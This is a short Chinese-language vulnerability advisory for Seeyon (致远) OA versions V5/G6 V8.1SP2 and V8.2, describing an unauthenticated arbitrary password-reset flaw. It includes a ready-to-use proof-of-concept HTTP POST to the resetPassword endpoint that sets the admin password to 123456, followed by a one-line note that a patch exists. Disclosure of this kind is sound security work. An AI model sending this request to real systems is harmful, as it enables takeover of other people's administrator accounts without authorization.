2023 致远OA-任意用户密码重置漏洞

一、致远OA

        致远OA是一款企业级办公自动化软件，它提供了一系列的办公自动化解决方案，包括文档管理、流程管理、协同办公、知识管理、人力资源管理等功能。致远OA可以帮助企业实现信息化管理，提高工作效率和管理水平，同时也可以提高企业的竞争力。

二、漏洞描述

致远OA组件存在任意密码修改漏洞的信息，漏洞威胁等级：高危。该漏洞是由于致远OA修改用户密码时收发验证码的接口存在缺陷，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行未授权重置密码攻击，最终越权登录账号并可能进一步实现远程代码执行。

影响范围

V5/G6 V8.1SP2、V8.2

三、漏洞复现 

poc：

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 56

{"loginName":"admin","password":"123456"}

截图：

四、修复建议 

致远官方已发布修复补丁

致远服务